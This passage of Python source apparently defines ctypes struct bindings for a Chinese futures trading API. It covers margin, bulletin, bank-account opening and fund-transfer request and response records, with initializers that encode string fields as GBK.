def __init__(self, BrokerID=None, MarginModelID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if MarginModelID:
self.MarginModelID = MarginModelID.encode("GBK")
class EWarrantOffset(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("InstrumentID", c_char_Array_31),
("Direction", c_char),
("HedgeFlag", c_char),
("Volume", c_int),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, TradingDay=None, BrokerID=None, InvestorID=None, ExchangeID=None, InstrumentID=None, Direction=None, HedgeFlag=None, Volume=None, InvestUnitID=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if Volume:
self.Volume = Volume
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryEWarrantOffset(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("InstrumentID", c_char_Array_31),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None, InstrumentID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryInvestorProductGroupMargin(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ProductGroupID", c_char_Array_31),
("HedgeFlag", c_char),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, ProductGroupID=None, HedgeFlag=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ProductGroupID:
self.ProductGroupID = ProductGroupID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class InvestorProductGroupMargin(Struct):
_fields_ = [
("ProductGroupID", c_char_Array_31),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("FrozenMargin", c_double),
("LongFrozenMargin", c_double),
("ShortFrozenMargin", c_double),
("UseMargin", c_double),
("LongUseMargin", c_double),
("ShortUseMargin", c_double),
("ExchMargin", c_double),
("LongExchMargin", c_double),
("ShortExchMargin", c_double),
("CloseProfit", c_double),
("FrozenCommission", c_double),
("Commission", c_double),
("FrozenCash", c_double),
("CashIn", c_double),
("PositionProfit", c_double),
("OffsetAmount", c_double),
("LongOffsetAmount", c_double),
("ShortOffsetAmount", c_double),
("ExchOffsetAmount", c_double),
("LongExchOffsetAmount", c_double),
("ShortExchOffsetAmount", c_double),
("HedgeFlag", c_char),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, ProductGroupID=None, BrokerID=None, InvestorID=None, TradingDay=None, SettlementID=None, FrozenMargin=None, LongFrozenMargin=None, ShortFrozenMargin=None, UseMargin=None, LongUseMargin=None, ShortUseMargin=None, ExchMargin=None, LongExchMargin=None, ShortExchMargin=None, CloseProfit=None, FrozenCommission=None, Commission=None, FrozenCash=None, CashIn=None, PositionProfit=None, OffsetAmount=None, LongOffsetAmount=None, ShortOffsetAmount=None, ExchOffsetAmount=None, LongExchOffsetAmount=None, ShortExchOffsetAmount=None, HedgeFlag=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if ProductGroupID:
self.ProductGroupID = ProductGroupID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if FrozenMargin:
self.FrozenMargin = FrozenMargin
if LongFrozenMargin:
self.LongFrozenMargin = LongFrozenMargin
if ShortFrozenMargin:
self.ShortFrozenMargin = ShortFrozenMargin
if UseMargin:
self.UseMargin = UseMargin
if LongUseMargin:
self.LongUseMargin = LongUseMargin
if ShortUseMargin:
self.ShortUseMargin = ShortUseMargin
if ExchMargin:
self.ExchMargin = ExchMargin
if LongExchMargin:
self.LongExchMargin = LongExchMargin
if ShortExchMargin:
self.ShortExchMargin = ShortExchMargin
if CloseProfit:
self.CloseProfit = CloseProfit
if FrozenCommission:
self.FrozenCommission = FrozenCommission
if Commission:
self.Commission = Commission
if FrozenCash:
self.FrozenCash = FrozenCash
if CashIn:
self.CashIn = CashIn
if PositionProfit:
self.PositionProfit = PositionProfit
if OffsetAmount:
self.OffsetAmount = OffsetAmount
if LongOffsetAmount:
self.LongOffsetAmount = LongOffsetAmount
if ShortOffsetAmount:
self.ShortOffsetAmount = ShortOffsetAmount
if ExchOffsetAmount:
self.ExchOffsetAmount = ExchOffsetAmount
if LongExchOffsetAmount:
self.LongExchOffsetAmount = LongExchOffsetAmount
if ShortExchOffsetAmount:
self.ShortExchOffsetAmount = ShortExchOffsetAmount
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QueryCFMMCTradingAccountToken(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class CFMMCTradingAccountToken(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("ParticipantID", c_char_Array_11),
("AccountID", c_char_Array_13),
("KeyID", c_int),
("Token", c_char_Array_21),
]
def __init__(self, BrokerID=None, ParticipantID=None, AccountID=None, KeyID=None, Token=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if KeyID:
self.KeyID = KeyID
if Token:
self.Token = Token.encode("GBK")
class QryProductGroup(Struct):
_fields_ = [
("ProductID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
]
def __init__(self, ProductID=None, ExchangeID=None):
super().__init__()
if ProductID:
self.ProductID = ProductID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class ProductGroup(Struct):
_fields_ = [
("ProductID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("ProductGroupID", c_char_Array_31),
]
def __init__(self, ProductID=None, ExchangeID=None, ProductGroupID=None):
super().__init__()
if ProductID:
self.ProductID = ProductID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ProductGroupID:
self.ProductGroupID = ProductGroupID.encode("GBK")
class Bulletin(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("TradingDay", c_char_Array_9),
("BulletinID", c_int),
("SequenceNo", c_int),
("NewsType", c_char_Array_3),
("NewsUrgency", c_char),
("SendTime", c_char_Array_9),
("Abstract", c_char_Array_81),
("ComeFrom", c_char_Array_21),
("Content", c_char_Array_501),
("URLLink", c_char_Array_201),
("MarketID", c_char_Array_31),
]
def __init__(self, ExchangeID=None, TradingDay=None, BulletinID=None, SequenceNo=None, NewsType=None, NewsUrgency=None, SendTime=None, Abstract=None, ComeFrom=None, Content=None, URLLink=None, MarketID=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BulletinID:
self.BulletinID = BulletinID
if SequenceNo:
self.SequenceNo = SequenceNo
if NewsType:
self.NewsType = NewsType.encode("GBK")
if NewsUrgency:
self.NewsUrgency = NewsUrgency.encode("GBK")
if SendTime:
self.SendTime = SendTime.encode("GBK")
if Abstract:
self.Abstract = Abstract.encode("GBK")
if ComeFrom:
self.ComeFrom = ComeFrom.encode("GBK")
if Content:
self.Content = Content.encode("GBK")
if URLLink:
self.URLLink = URLLink.encode("GBK")
if MarketID:
self.MarketID = MarketID.encode("GBK")
class QryBulletin(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("BulletinID", c_int),
("SequenceNo", c_int),
("NewsType", c_char_Array_3),
("NewsUrgency", c_char),
]
def __init__(self, ExchangeID=None, BulletinID=None, SequenceNo=None, NewsType=None, NewsUrgency=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if BulletinID:
self.BulletinID = BulletinID
if SequenceNo:
self.SequenceNo = SequenceNo
if NewsType:
self.NewsType = NewsType.encode("GBK")
if NewsUrgency:
self.NewsUrgency = NewsUrgency.encode("GBK")
class ReqOpenAccount(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("Gender", c_char),
("CountryCode", c_char_Array_21),
("CustType", c_char),
("Address", c_char_Array_101),
("ZipCode", c_char_Array_7),
("Telephone", c_char_Array_41),
("MobilePhone", c_char_Array_21),
("Fax", c_char_Array_41),
("EMail", c_char_Array_41),
("MoneyAccountStatus", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("InstallID", c_int),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("CashExchangeCode", c_char),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("TID", c_int),
("UserID", c_char_Array_16),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, CashExchangeCode=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, TID=None, UserID=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if Gender:
self.Gender = Gender.encode("GBK")
if CountryCode:
self.CountryCode = CountryCode.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if ZipCode:
self.ZipCode = ZipCode.encode("GBK")
if Telephone:
self.Telephone = Telephone.encode("GBK")
if MobilePhone:
self.MobilePhone = MobilePhone.encode("GBK")
if Fax:
self.Fax = Fax.encode("GBK")
if EMail:
self.EMail = EMail.encode("GBK")
if MoneyAccountStatus:
self.MoneyAccountStatus = MoneyAccountStatus.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallID:
self.InstallID = InstallID
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if CashExchangeCode:
self.CashExchangeCode = CashExchangeCode.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if TID:
self.TID = TID
if UserID:
self.UserID = UserID.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class ReqCancelAccount(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("Gender", c_char),
("CountryCode", c_char_Array_21),
("CustType", c_char),
("Address", c_char_Array_101),
("ZipCode", c_char_Array_7),
("Telephone", c_char_Array_41),
("MobilePhone", c_char_Array_21),
("Fax", c_char_Array_41),
("EMail", c_char_Array_41),
("MoneyAccountStatus", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("InstallID", c_int),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("CashExchangeCode", c_char),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("TID", c_int),
("UserID", c_char_Array_16),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, CashExchangeCode=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, TID=None, UserID=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if Gender:
self.Gender = Gender.encode("GBK")
if CountryCode:
self.CountryCode = CountryCode.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if ZipCode:
self.ZipCode = ZipCode.encode("GBK")
if Telephone:
self.Telephone = Telephone.encode("GBK")
if MobilePhone:
self.MobilePhone = MobilePhone.encode("GBK")
if Fax:
self.Fax = Fax.encode("GBK")
if EMail:
self.EMail = EMail.encode("GBK")
if MoneyAccountStatus:
self.MoneyAccountStatus = MoneyAccountStatus.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallID:
self.InstallID = InstallID
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if CashExchangeCode:
self.CashExchangeCode = CashExchangeCode.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if TID:
self.TID = TID
if UserID:
self.UserID = UserID.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class ReqChangeAccount(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("Gender", c_char),
("CountryCode", c_char_Array_21),
("CustType", c_char),
("Address", c_char_Array_101),
("ZipCode", c_char_Array_7),
("Telephone", c_char_Array_41),
("MobilePhone", c_char_Array_21),
("Fax", c_char_Array_41),
("EMail", c_char_Array_41),
("MoneyAccountStatus", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("NewBankAccount", c_char_Array_41),
("NewBankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("BankAccType", c_char),
("InstallID", c_int),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("BrokerIDByBank", c_char_Array_33),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("TID", c_int),
("Digest", c_char_Array_36),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, NewBankAccount=None, NewBankPassWord=None, AccountID=None, Password=None, BankAccType=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, BrokerIDByBank=None, BankPwdFlag=None, SecuPwdFlag=None, TID=None, Digest=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if Gender:
self.Gender = Gender.encode("GBK")
if CountryCode:
self.CountryCode = CountryCode.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if ZipCode:
self.ZipCode = ZipCode.encode("GBK")
if Telephone:
self.Telephone = Telephone.encode("GBK")
if MobilePhone:
self.MobilePhone = MobilePhone.encode("GBK")
if Fax:
self.Fax = Fax.encode("GBK")
if EMail:
self.EMail = EMail.encode("GBK")
if MoneyAccountStatus:
self.MoneyAccountStatus = MoneyAccountStatus.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if NewBankAccount:
self.NewBankAccount = NewBankAccount.encode("GBK")
if NewBankPassWord:
self.NewBankPassWord = NewBankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if InstallID:
self.InstallID = InstallID
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if TID:
self.TID = TID
if Digest:
self.Digest = Digest.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class ReqTransfer(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustType", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("InstallID", c_int),
("FutureSerial", c_int),
("UserID", c_char_Array_16),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("TradeAmount", c_double),
("FutureFetchAmount", c_double),
("FeePayFlag", c_char),
("CustFee", c_double),
("BrokerFee", c_double),
("Message", c_char_Array_129),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("TransferStatus", c_char),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, FutureSerial=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, TradeAmount=None, FutureFetchAmount=None, FeePayFlag=None, CustFee=None, BrokerFee=None, Message=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, TransferStatus=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallID:
self.InstallID = InstallID
if FutureSerial:
self.FutureSerial = FutureSerial
if UserID:
self.UserID = UserID.encode("GBK")
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if TradeAmount:
self.TradeAmount = TradeAmount
if FutureFetchAmount:
self.FutureFetchAmount = FutureFetchAmount
if FeePayFlag:
self.FeePayFlag = FeePayFlag.encode("GBK")
if CustFee:
self.CustFee = CustFee
if BrokerFee:
self.BrokerFee = BrokerFee
if Message:
self.Message = Message.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if TransferStatus:
self.TransferStatus = TransferStatus.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class RspTransfer(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustType", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("InstallID", c_int),
("FutureSerial", c_int),
("UserID", c_char_Array_16),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("TradeAmount", c_double),
("FutureFetchAmount", c_double),
("FeePayFlag", c_char),
("CustFee", c_double),
("BrokerFee", c_double),
